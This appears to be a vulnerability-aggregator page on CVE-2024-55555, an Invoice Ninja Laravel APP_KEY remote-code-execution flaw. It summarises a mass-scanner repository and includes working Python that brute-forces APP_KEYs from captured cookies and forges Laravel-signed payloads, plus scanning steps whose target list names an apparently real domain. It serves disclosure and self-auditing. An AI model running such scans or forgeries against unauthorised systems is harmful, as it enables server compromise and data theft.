Invoice Ninja Laravel APP_KEY Remote Code Execution Vulnerability

Vulnerability Information

Vulnerability name: Invoice Ninja Laravel APP_KEY remote code execution vulnerability

Vulnerability ID:

  • CVE: CVE-2024-55555

Vulnerability type: Remote code execution

Severity: Critical

Description: Affected product: Invoice Ninja is open-source invoicing and billing software, widely used by businesses and individuals to generate invoices and manage clients and payments. It is built on the Laravel framework and offers a rich feature set and flexible deployment options; being open source and easy to use, it is deployed worldwide.

Explanation: CVE-2024-55555 is an unauthenticated remote code execution (RCE) vulnerability in Invoice Ninja caused by insecure handling of Laravel's APP_KEY. Laravel's Encrypter uses APP_KEY both to encrypt values such as cookies and to authenticate them with an HMAC, so anyone who holds the key can not only decrypt existing payloads but also forge new ones that the application accepts as genuine. If APP_KEY is known or guessable (for example, copied from a public repository, container image or documentation), an attacker can craft an encrypted payload carrying serialized data; where the application unserializes what it decrypts, that payload leads to execution of arbitrary PHP code. The root cause is that the encryption key is not generated, protected and used securely, which lets an attacker bypass every protection that depends on it.

Impact analysis: The risk is critical. An attacker needs no credentials to execute arbitrary code remotely, which can lead to full server compromise, data theft or service disruption. Exploitation is comparatively easy, and automated tooling exists (such as the Laravel Crypto Killer Mass Scanner described below) that can find and exploit vulnerable instances at scale. Operators should check and update their Invoice Ninja instances immediately and make sure APP_KEY is a unique, randomly generated value (for example from `php artisan key:generate`) rather than one copied from an example, image or public repository. Note that rotating the key invalidates existing encrypted cookies and any data encrypted under the old key, so plan the rotation accordingly.

Vendor: Invoice Ninja

Product: Invoice Ninja

Source: https://github.com/Yucaerin/CVE-2024-55555

Type: CVE-2024: GitHub search

Repository files

  • mass.py
  • readme.md

Source overview

Laravel Crypto Killer Mass Scanner (CVE-2024-55555)

This script performs a mass scan of Laravel-based applications for CVE-2024-55555, an unauthenticated remote code execution (RCE) vulnerability in Invoice Ninja. It automates detecting sites whose Laravel-encrypted cookies verify under a weak or known APP_KEY and reports which of them are vulnerable.

📌 How It Works

  1. Reads a list of domains from list.txt.
  2. Sends a request to each target and captures the Laravel-encrypted cookie (excluding XSRF-TOKEN).
  3. Runs a brute-force decryption using laravel-crypto-killer to find a valid APP_KEY.
  4. If a valid key is found, the result is saved to result.txt in the format:

```
domain.tld|base64:APP_KEY
```
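The mechanism described in the explanation above (a known APP_KEY lets an attacker verify, decrypt and forge Laravel-encrypted payloads) and steps 2 to 4 of the scanner's workflow reduce to a single check: does a candidate key reproduce the HMAC on a captured cookie? The Python below is an added example written for this page; it is not code from the Yucaerin repository or from laravel-crypto-killer. It implements Laravel's encrypted-payload format with the standard library only, picks a sample cookie the way the README describes (longest cookie that is not XSRF-TOKEN), and matches it against a small wordlist. The key, wordlist entries, cookie names and cookie contents are all constructed for the demo, and the AES-256-CBC step is omitted on purpose because the MAC alone identifies the key.

```python
"""Laravel payload parsing and APP_KEY wordlist matching (added example, stdlib only)."""
import base64
import hashlib
import hmac
import json
import urllib.parse

# Laravel's CSRF cookie; the scanner skips it when choosing a sample cookie.
XSRF_COOKIE = "XSRF-TOKEN"


def load_app_key(app_key: str) -> bytes:
    """APP_KEY as written in .env -> raw key bytes. Laravel strips a leading
    'base64:' and base64-decodes the rest; any other string is used verbatim."""
    if app_key.startswith("base64:"):
        return base64.b64decode(app_key[len("base64:"):], validate=True)
    return app_key.encode()


def laravel_mac(key: bytes, iv_b64: str, value_b64: str) -> str:
    """Encrypter::hash(): hex HMAC-SHA256 over the concatenated *base64
    strings* of IV and ciphertext, not over the raw bytes."""
    return hmac.new(key, (iv_b64 + value_b64).encode(), hashlib.sha256).hexdigest()


def parse_cookie(cookie_value: str):
    """Decode a cookie value into Laravel's {iv, value, mac[, tag]} payload,
    or None when it is not shaped like a Laravel-encrypted value."""
    try:
        raw = base64.b64decode(urllib.parse.unquote(cookie_value), validate=True)
        payload = json.loads(raw)
    except ValueError:  # binascii.Error, JSONDecodeError and UnicodeDecodeError
        return None
    if not isinstance(payload, dict):
        return None
    if not all(isinstance(payload.get(k), str) for k in ("iv", "value", "mac")):
        return None
    return payload


def pick_sample_cookie(cookies):
    """The scanner's heuristic over (name, value) pairs: the longest cookie
    that is not XSRF-TOKEN and parses as a Laravel payload, else None."""
    candidates = [v for n, v in cookies if n != XSRF_COOKIE and parse_cookie(v)]
    return max(candidates, key=len) if candidates else None


def find_app_key(cookie_value: str, wordlist):
    """First wordlist entry whose MAC matches the cookie, else None. Only the
    HMAC is checked: Laravel itself rejects a payload on a MAC mismatch before
    decrypting, so no AES step is needed to confirm a candidate key."""
    payload = parse_cookie(cookie_value)
    if payload is None:
        return None
    for entry in wordlist:
        entry = entry.strip()
        if not entry:
            continue
        try:
            key = load_app_key(entry)
        except ValueError:  # malformed base64: entry in the wordlist
            continue
        expected = laravel_mac(key, payload["iv"], payload["value"])
        if hmac.compare_digest(expected.encode(), payload["mac"].encode()):
            return entry
    return None


def make_cookie(app_key: str, ciphertext: bytes, iv: bytes) -> str:
    """Mint a payload in Laravel's wire format around a given ciphertext.
    The AES-256-CBC step is deliberately left out (it would need a third-party
    library); the MAC covers the base64 ciphertext as-is, so any bytes do."""
    iv_b64 = base64.b64encode(iv).decode()
    value_b64 = base64.b64encode(ciphertext).decode()
    payload = {
        "iv": iv_b64,
        "value": value_b64,
        "mac": laravel_mac(load_app_key(app_key), iv_b64, value_b64),
        "tag": "",
    }
    return base64.b64encode(json.dumps(payload, separators=(",", ":")).encode()).decode()


# Constructed demo data: a "leaked" key, a wordlist that happens to contain it,
# and the cookies one response might set. Names and values are hypothetical.
LEAKED_KEY = "base64:" + base64.b64encode(b"\x11" * 32).decode()
WORDLIST = [
    "base64:" + base64.b64encode(b"\x00" * 32).decode(),  # hypothetical default key
    "SomeRandomStringWith32Characters",                     # plain (non-base64) form
    LEAKED_KEY,
]
SESSION_COOKIE = make_cookie(LEAKED_KEY, ciphertext=b"\x00" * 48, iv=b"\x01" * 16)
CAPTURED_COOKIES = [
    ("XSRF-TOKEN", make_cookie(LEAKED_KEY, ciphertext=b"\x02" * 64, iv=b"\x03" * 16)),
    ("laravel_session", SESSION_COOKIE),
    ("tracking", "plain-value"),  # not Laravel-encrypted; must be ignored
]

if __name__ == "__main__":
    sample = pick_sample_cookie(CAPTURED_COOKIES)
    print("[+] Key found:", find_app_key(sample, WORDLIST))
```

Because a wrong key costs one HMAC computation per candidate, a wordlist of a few thousand keys is checked in well under a second per target, which is why such scans are cheap to run at scale. The same `find_app_key` call run against your own deployment, with a wordlist made of every key you have ever committed, published or shipped in an image, tells you whether your current APP_KEY is exposed.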

🧱 Requirements

Before using this tool, you must install and configure laravel-crypto-killer.

🔧 Install Laravel-Crypto-Killer

```bash
git clone https://github.com/synacktiv/laravel-crypto-killer.git
cd laravel-crypto-killer
pip install -r requirements.txt
```

⚠️ It’s recommended to use a Python virtual environment.

🗂️ Wordlists

Ensure that the wordlists/ folder contains appropriate keys to brute-force with. You can use the default ones or add your own APP_KEY values (in base64: format).

🚀 Usage

  1. Prepare your list.txt with one domain per line (no http or https required):

```
portal.upnode.com.au
account.example.com
```

  2. Run the script:

```bash
python3 mass_laravel_crypto_bruteforce.py
```

  3. If successful, the script will output:

```
[+] Key found for account.example.com: base64:RR++yx2rJ9kdxbdh3+AmbHLDQu+Q76i++co9Y8ybbno=
```

And save it in result.txt.

🛡️ About CVE-2024-55555

  • Vulnerability: Invoice Ninja does not properly secure Laravel APP_KEY usage.
  • Impact: If the APP_KEY is known or guessable, remote attackers can:
    • Decrypt cookies or serialized data.
    • Craft malicious payloads.
    • Execute arbitrary PHP code.
  • Reference:

🧠 Notes

  • The script automatically selects the longest cookie (excluding XSRF-TOKEN) assuming it’s the encrypted session.
  • Parallel scanning is supported via ThreadPoolExecutor for faster performance.
  • Only targets with Laravel-encrypted cookies will be processed.

✅ Example Output

```
[+] Key found for account.example.com: base64:RR++yx2rJ9kdxbdh3+AmbHLDQu+Q76i++co9Y8ybbno=
```

⚠️ Disclaimer

This tool is for educational and authorized testing only.
Do not use this on systems without explicit permission.
You are solely responsible for your actions.

Source page: http://example.com/2025/08/01/github_326564460/
Author: lianccc
Published: 1 August 2025